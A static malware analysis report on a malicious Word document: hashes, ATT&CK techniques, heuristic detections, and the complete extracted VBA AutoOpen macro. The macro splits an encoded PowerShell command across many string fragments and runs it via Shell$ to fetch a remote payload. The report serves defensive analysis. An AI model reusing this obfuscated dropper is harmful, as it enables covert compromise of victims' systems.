Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6cb806c861e15bfb…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 185.5 KB
Created: 2018-02-07 20:31:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: ec799a4a4998f122b91cfd35bdf4206b
SHA-1: a8b89b076728a12a00a3b4d08e0ebee07d39f85a
SHA-256: 6cb806c861e15bfb4c377522373b0634e4088824a1461a27d02d899dee5383f0
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. Its AutoOpen macro executes an obfuscated PowerShell command: it reconstructs the command 'Invoke-webrequest https://uspra5140.com/a', which is likely used to download and execute a second-stage payload. Obfuscated PowerShell launched from an AutoOpen macro is a common initial-compromise technique for malicious documents.

Heuristics (7)

  • VBA macros detected (severity: medium; 3 related findings; rule OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Potential Shell call in VBA (severity: critical; rule OLE_VBA_SHELL)
    Matched line in script:
        FQ_MJ = FS_KF & " -e " & BK_ND
        Shell$ FQ_MJ
    End Sub
  • Dangerous API name reassembled from split string literals (severity: critical; rule OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script:
        FQ_MJ = FS_KF & " -e " & BK_ND
        Shell$ FQ_MJ
    End Sub
  • AutoOpen macro (severity: low; rule OLE_VBA_AUTOOPEN)
    Matched line in script:
    Attribute VB_Name = "StockUpdate"
    Sub AutoOpen()
        Dim CL_MD As String
  • Reference to PowerShell (severity: high; rule SC_STR_POWERSHELL)
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5177 bytes
SHA-256: b841dff21c3a6df34059fa81d11530bbdd30fe30daaf9bef61d6a8b842dde4e2

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "StockUpdate"
Sub AutoOpen()
    Dim CL_MD As String
    CL_MD = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
    Dim AK_KG As String
    AK_KG = "QAeAApAHsAcgBlAHQAdQBy"
    Dim IO_SE As String
    IO_SE = "AG4AIABbAFMAeQBzA"
    Dim IT_RF As String
    IT_RF = "HQAZQBtAC4AVABlAHgAdAAuAEUA"
    Dim FT_KB As String
    FT_KB = "bgBjAG8AZABpAG4AZwBdADoAOgBVAFQA"
    BK_ND = BK_ND & CL_MD & AK_KG & IO_SE & IT_RF & FT_KB
    Dim JK_KC As String
    JK_KC = "RgA4AC4ARw"
    Dim IQ_TG As String
    IQ_TG = "BlAHQAUwB0AHIAaQBuAGcAKAB"
    Dim IK_KG As String
    IK_KG = "bAFMAeQ"
    Dim HL_RJ As String
    HL_RJ = "BzAHQAZQBtAC4AQwBvAG4AdgBlA"
    Dim AK_NF As String
    AK_NF = "HIAdABdADoAOgBGAHIAbwBtAEIAYQBzA"
    BK_ND = BK_ND & JK_KC & IQ_TG & IK_KG & HL_RJ & AK_NF
    Dim CT_RD As String
    CT_RD = "GUANgA0AF"
    Dim BQ_PD As String
    BQ_PD = "MAdAByAGkA"
    Dim IK_RF As String
    IK_RF = "bgBnACgA"
    Dim ER_RB As String
    ER_RB = "JAB4ACkAKQB9ADsAaQBlAHg"
    Dim BL_KD As String
    BL_KD = "AIAAkACgAY"
    BK_ND = BK_ND & CT_RD & BQ_PD & IK_RF & ER_RB & BL_KD
    Dim AL_RJ As String
    AL_RJ = "QAgACQAKAAkACgAJAAoAGkAbgB2"
    Dim AK_TH As String
    AK_TH = "AG8AawBlAC0AdwBlAGIA"
    Dim GT_RJ As String
    GT_RJ = "cgBlAHEAdQBlAHMAdAAgACcAaAB0AHQ"
    Dim EK_QF As String
    EK_QF = "AcABzADoALwAvAHUA"
    Dim AQ_QE As String
    AQ_QE = "cwBwAHIAZAA1ADEANQAwAG"
    BK_ND = BK_ND & AL_RJ & AK_TH & GT_RJ & EK_QF & AQ_QE
    Dim FN_RD As String
    FN_RD = "MAZQBuAH"
    Dim CQ_MI As String
    CQ_MI = "QAcgBhAG"
    Dim HL_KG As String
    HL_KG = "wALgB0AGEAYgBsAGUALgBjAG8AcgB"
    Dim HO_SA As String
    HO_SA = "lAC4AdwBpAG4AZABvAHcAcwAuAG4A"
    Dim IL_RA As String
    IL_RA = "ZQB0AC8AdwBhAHIAZQBoAG8"
    BK_ND = BK_ND & FN_RD & CQ_MI & HL_KG & HO_SA & IL_RA
    Dim EM_LG As String
    EM_LG = "AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD"
    Dim BN_RB As String
    BN_RB = "0AUABhAHIAdA"
    Dim BS_LF As String
    BS_LF = "BpAHQAaQBvAG"
    Dim AL_PB As String
    AL_PB = "4ASwBlAHkAJQAyADAAZQBxACUAMgAwAC"
    Dim IK_PH As String
    IK_PH = "UAMgA3AHMAdAB"
    BK_ND = BK_ND & EM_LG & BN_RB & BS_LF & AL_PB & IK_PH
    Dim GP_OJ As String
    GP_OJ = "hAGcAZQAlADIANw"
    Dim IS_LJ As String
    IS_LJ = "AmACQAUwBlAGwAZQBjAHQAPQBkAGEAdA"
    Dim JK_SF As String
    JK_SF = "BhACYAcwB2AD0AMgAwADEANwAtADAANAAtA"
    Dim BN_QA As String
    BN_QA = "DEANwAmAHMAcwA9AGI"
    Dim BL_LC As String
    BL_LC = "AZgBxAHQAJgBz"
    BK_ND = BK_ND & GP_OJ & IS_LJ & JK_SF & BN_QA & BL_LC
    Dim CQ_SC As String
    CQ_SC = "AHIAdAA"
    Dim EM_QJ As String
    EM_QJ = "9AHMAYwBvACYAcwBwAD0Ac"
    Dim EQ_SJ As String
    EQ_SJ = "gB3AGQAbABhAGMAdQBwACYAcwBlAD0"
    Dim IP_OI As String
    IP_OI = "AMgAwADEANwAtADEAMA"
    Dim HN_PF As String
    HN_PF = "AtADAANgB"
    BK_ND = BK_ND & CQ_SC & EM_QJ & EQ_SJ & IP_OI & HN_PF
    Dim CP_OI As String
    CP_OI = "UADIAMgA6ADQAMQA6"
    Dim HM_NB As String
    HM_NB = "ADEAMgBaAC"
    Dim BK_PG As String
    BK_PG = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADI"
    Dim AP_MA As String
    AP_MA = "AOABUADE"
    Dim GO_NE As String
    GO_NE = "ANAA6ADQAM"
    BK_ND = BK_ND & CP_OI & HM_NB & BK_PG & AP_MA & GO_NE
    Dim EK_NE As String
    EK_NE = "QA6ADEA"
    Dim AM_ME As String
    AM_ME = "MgBaACYAcwBwAHIAPQ"
    Dim GK_PI As String
    GK_PI = "BoAHQAdABwAHMAJgBzAGkAZwA9AHQAe"
    Dim DQ_PG As String
    DQ_PG = "gBQADcAY"
    Dim IL_NJ As String
    IL_NJ = "wA4AHgAWgBoAHIAMQBzAGIAdgB4AD"
    BK_ND = BK_ND & EK_NE & AM_ME & GK_PI & DQ_PG & IL_NJ
    Dim BO_KB As String
    BO_KB = "kAZgBKAFMAdwBK"
    Dim JQ_MH As String
    JQ_MH = "AEkAUwBIAEIANgB"
    Dim ET_KF As String
    ET_KF = "lADgAJQAyAEIAbgBs"
    Dim HS_RC As String
    HS_RC = "AGwAdQBuAEgAaQBmAEwAMwBoAHgA"
    Dim HS_QE As String
    HS_QE = "agA0ACUAMwBEACcAIAAtAEgAZQBhAG"
    BK_ND = BK_ND & BO_KB & JQ_MH & ET_KF & HS_RC & HS_QE
    Dim FK_TE As String
    FK_TE = "QAZQByAHMAIABAAHsAJwBBAGMAYwBlAH"
    Dim JT_KI As String
    JT_KI = "AAdAAnAD0AJwBBAHAAcABsAGkAYwBh"
    Dim AQ_OB As String
    AQ_OB = "AHQAaQBvA"
    Dim DO_OD As String
    DO_OD = "G4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4A"
    Dim EN_NB As String
    EN_NB = "dABlAG4AdAAgAHwAIABD"
    BK_ND = BK_ND & FK_TE & JT_KI & AQ_OB & DO_OD & EN_NB
    Dim HT_KI As String
    HT_KI = "AG8AbgB2AGUAcgB0AEYAcgBvAG"
    Dim IN_KF As String
    IN_KF = "0ALQBKAHMAbwBuACkALgB2AGEAbAB1AGU"
    BK_ND = BK_ND & HT_KI & IN_KF
    Dim EP_SE As String
    EP_SE = "ALgBkAGEAdABh"
    BK_ND = BK_ND & EP_SE
    Dim IM_LJ As String
    IM_LJ = "ACkAKQA="
    BK_ND = BK_ND & IM_LJ
    FS_KF = "p" + "O" + "w" + "E" + "r" + "S" + "h" + "E" + "l" + "L"
    FQ_MJ = FS_KF & " -e " & BK_ND
    Shell$ FQ_MJ
End Sub